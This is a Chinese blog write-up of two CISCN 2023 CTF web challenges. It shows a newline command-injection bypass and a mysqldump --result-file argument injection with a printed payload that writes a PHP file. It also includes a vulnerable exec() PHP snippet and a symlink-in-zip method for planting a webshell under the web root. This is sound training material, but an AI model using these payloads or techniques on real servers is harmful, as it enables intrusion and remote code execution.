ciscn2023-web 总结与思考

已于 2023-05-29 18:05:02 修改
阅读量443 收藏
点赞数
文章标签: php
于 2023-05-29 18:02:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64348326/article/details/130933666
版权

dumpit

1.一开始本以为是一个简单的dump界面的命令注入,因为猜测源语句可能是先执行命令读取创建日志信息,然后file_get_contents写入/log/目录中。所以一开始就在读取的table_2_dump参数中进行fuzz,发现很多能用来执行命令的符号,例如反引号、$、|、;均被过滤了,不过尝试换行符成功了,于是尝试执行env成功在环境变量中找到了flag。

2.赛后才知道这是非预期解,预期是mariadb-dump:mariadb-dump官方文档。官方文档中说明了这是一个备份程序,在shell中可以执行备份操作,安装的mysqldump就是链接到该程序中的。它的常用操作:

//打印帮助信息
shell>mysqldump --help
//查看版本
shell>mysqldump --version
//转存所有数据库
shell>mysqldump -uroot -proot --all-databases
//转存指定的数据库test,传递多个参数时,从第二个开始将视为数据库中的表名
shell>mysqldump -uroot -proot --databases test
//减少详细输出
shell>mysqldump -uroot -proot --databases test --compact
//在输出末尾加上日期注释
shell>mysqldump -uroot -proot --databases test --dump-date
//在指定数据库test中指定表名
shell>mysqldump -uroot -proot --databases test --tables users
//将数据输出到指定test.log文件中
shell>mysqldump -uroot -proot --databases test --tables users > test.log
或
shell>mysqldump -uroot -proot --databases test --tables users --result-file=test.log

在这里插入图片描述

3.一般漏洞的产生都是有输入点可控的,当我们使用mysqldump -uroot -proot --databases --tables flag666 >test.log,尽管flag666数据库不存在,但依旧作为database的参数写入到了test.log日志中,而如果我们将flag666替换成<?php phpinfo();?>,log中的database参数也会被替换成我们输入的内容。
在这里插入图片描述

4.所以我们写入的内容有控制点,那么要写马的话,就需要解决的是文件名的问题了。我们可以看到上面的常用语句中有个参数--result-file=可以指定输出到某个文件中,刚好能用这个参数来指定写入的文件名和后缀。

5.由于环境已经关闭了,可以根据页面信息推测,其实原本的代码应该是类似于下面这段(没加waf):

<?php
 header('Content-type:text/html; charset=utf-8');
$db = $_GET['db'];
$dump = $_GET['table_2_dump'];
$log_name = md5(microtime().'-'.rand(1000000000,9999999999)).".log";
if (isset($db)||isset($dump)) {
    $c = "mysqldump -uroot -proot --databases " . $db . " --tables " . $dump . " --dump-date > D:\phpstudy_pro\WWW\\test\log\\" . $log_name;
    exec($c);
    echo "$log_name";
}
?>

6.其中waf是有过滤的,我们用短标签输出,最终payload:?db="<?=phpinfo()?>" --result-file=test1.php&table_2_dump=
在这里插入图片描述

unzip

1.看到这题的代码,我有两个思路:一是文件上传时可控文件名经过拼接执行命令;二是上传链接到根目录/flag的软链接压缩文件,访问上传的文件直接读取flag。

2.但首先$_FILE['tmp']['name']是不可控的,所以第一个思路走不通;第二个因为它上传的压缩包是在/tmp目录下解压的,就算解压了也无法访问上传到的软链接文件。后面找到一个类似的原题:软链接连接目录

3.这种解法就是在第二种思路上改良,把软链接文件改为软链接目录。创建一个连接到/var/www/html目录的软链接,命名为2并压缩到zip包中;然后再创建一个命名为2的文件夹,存放我们的webshell,然后连同文件夹一起压缩。最后先上传我们的软链接压缩包,经过zip解压后将在/tmp目录下生成一个/var/www/html -> 2的软链接目录;然后当我们上传含有webshell的压缩文件夹时,进行解压得到/2/shell.php,由于开始就有一个2的软链接目录,所以我们上传的shell.php将会被解压到软链接目录中,就是是上传到/var/www/html目录中。

4.最后直接访问shell.php,也就是我们的后门文件,执行命令获得flag。

光迹ovo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【CTF】2023Ciscn WEB方向题解
Sapphire037的博客
05-29 2329
比赛体验一般,一黑灯基本上题都烂掉。
2023ciscn初赛 -- BackendService
qq_44640313的博客
06-03 842
CVE-2022-22947的漏洞和nacos存在鉴权漏洞
CISCNweb篇)命令执行
cxiaodi的博客
05-05 793
ctf命令执行专题
2023CISCN—华中赛区—pwn wp
m0_63437215的博客
07-13 1149
ciscn2023华中赛区pwn
[2023CISCN]国赛初赛WEB题目复现
qq_42585535的博客
10-23 506
最近几个月在学免杀,JAVA安全以及JS相关内容,导致CTF摆了很久,这次复现国赛题目就当做恢复训练了。
cisco-WEB界面配置路由器.pdf
07-12
web 界面玩路由器 2011/10/9 凌晨 2::55 WEB 界面配置路由器的命令 目前市场上很多思科路由器或者交换机都可以通过 WEB 方式配置了!尽管很多功能还是只 能通过 CLI 配置,但是一些功能还是很有用的,例如端口的...
Cisco AIR-CAP2702I-H-K9/AIR-CAP3602I-H-K9固件-胖AP Web版本
09-09
如果你们企业有多余的思科AP,然后又没有AC的控制器,并且想利用起来,可以进行刷如胖AP的固件,进行web管理。写完可以帮到你们能够对旧/高性能的Cisco AP AIR-CAP2702I-H-K9/AIR-CAP3602I-H-K9用起来,这样绝对比...
思科超强模拟器 WEB-IOU中文版使用手册
10-15
思科超强模拟器 WEB-IOU中文版使用手册,讲的很细致,包括安装、xx、配置NETMAP之类的都有,很全,推荐给大家!
思科常用图标 Cisco Icons-2013.ppt
09-06
思科常用图标 Cisco Icons-2013.ppt
思科CISCO WebIOU-on-Linux 使用说明英文版
07-16
思科CISCO WebIOU-on-Linux 使用说明英文版
ciscn2023初赛 writeup
S4n_v1的博客
05-28 2812
第十六届全国大学生信息安全竞赛创新实践能力赛初赛wp。 pwn 2/6, misc 5/7, crypto 4/7, re 2/6, web 3/6
2023全国大学生信息安全竞赛(ciscn)初赛题解
返璞归真的博客
05-28 9765
2023全国大学生信息安全竞赛(ciscn)部分题解
2023Ciscn解题思路
qq_74388419的博客
05-30 276
去公众号找提示给了print(open(‘etc/passwd’).read())那么尝试print(open(‘/flag’).read())得到flag。
CISCN2023国赛复现
wwwwyyyrre的博客
07-19 245
下载附件打开 他的题目叫modbus modbus是一种协议在这些流量里都找不到有用信息,但是发现了有tcp的追踪流 打开看看发现两个一组的这几行数字组合像是base编码放到base家族解一下密最后在base32解出flag NSSCTF{c1f_fi1g_1000}
[CISCN 2023 华北]pysym
最新发布
rev1ve的博客
11-17 432
分析一下,首先检查上传文件是否为空以及文件大小,对文件名进行路径拼接,然后给出上传成功后随机的文件路径,try命令执行tar解压文件,这里存在RCE漏洞,我们可以利用。除此之外,发现当savepath包含一些特殊字符时会引发file.save(savepath)报错,用base64避免。因为os.system是无回显的,我们尝试反弹shell。随便上传一个文件,bp抓包修改文件名。
ciscn国赛初赛web(4道低分题)
羽的博客
05-16 7093
文章目录easy_sqleasy_sourcemiddle_sourceupload easy_sql 经过简单尝试发现为单引号括号闭合,并且可用使用报错注入注出库名 uname=1')||extractvalue('abc',concat('~',database()))%23&passwd=1 接着尝试利用information_schema库注表名,但是发现information被过滤掉了 那么可用无列名注入 获取到第一个列名id uname=1') ||updatexml("~",co
2023CISCN初赛
这个人很懒,什么都懒得写
06-04 931
随便写写
CISCN2023 badkey1&badkey2
qq_41626232的博客
05-29 832
这里只有n,e,d,没有p,q所以会跳到下面的else。再对生成的q,依次每个素数进行二次剩余判断是否等于上述由p生成的结果。后面使用while循环生成q的同时爆破a,对于a爆破(0,e)就好。p是给定的,使用可以先计算15个素数在模p的二次剩余和二次非剩余。查看当前生成的碰撞字典长度为10的个数,这里有2万个就足够了。即对每个数,有1/2的可能满足,所有2到50一共15个素数。源码分解取的g是2到100间的偶数。生成3000个也有大概10%的概率找到一个q。这样写肯定是不行的,可以先本地生成。
ciscn2022-线上-半决-pwn
m0_51185908的博客
09-13 1478
ciscn2022-线上-半决-pwn
思科----小型网络拓扑
09-06
- *2* [思科----小型网络拓扑](https://blog.csdn.net/qq_48626285/article/details/108837598)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值